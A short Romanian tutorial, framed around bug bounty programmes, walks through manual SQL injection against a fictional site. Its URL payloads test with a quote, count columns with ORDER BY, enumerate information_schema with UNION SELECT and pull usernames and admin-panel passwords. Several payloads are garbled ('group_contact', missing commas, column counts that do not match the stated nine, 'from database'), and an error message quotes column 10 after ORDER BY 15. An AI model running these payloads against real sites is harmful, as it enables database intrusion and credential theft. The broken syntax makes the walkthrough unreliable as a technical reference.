Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL.
Eu am sa pun urmatorul site fictional:
https://victimescu.com/index.php?id=5
Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul (').
Daca acesta este vulnerabil va scrie urmatoarea chestie:
You have an error in your SQL syntax; check the manual that corresponds to your….. Continued
Daca acesta nu este vulnerabil, site-ul nostru va functiona normal.
In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus.
- Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL.
https://victimescu.com/index.php?id=5 ORDER BY 5 -
Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date.
Incercam sa marim numarul cu 10.
https://victimescu.com/index.php?id=1 ORDER BY 15-
Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente.
Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’
Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane.
Acum continuam doar cu parametrul (UNION SELECT).
https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9
In continuare trebuie sa apara 2 numere care indica unde facem injectarea.
-------------------------------------------------
Un numar din cele 2 va fi boldit.
-------------------------------------------------
Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5.
https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables
Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date.
CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS
In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda:
https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()-
in continuare o sa ne apara:
-useri
-parole
-email-uri
-etc
https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database-
Aceasta comanda a fost folosita pentru a afla parola de la panel.
-------------------------------------------------
Deseori parola va fi in format MD5
-------------------------------------------------
Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.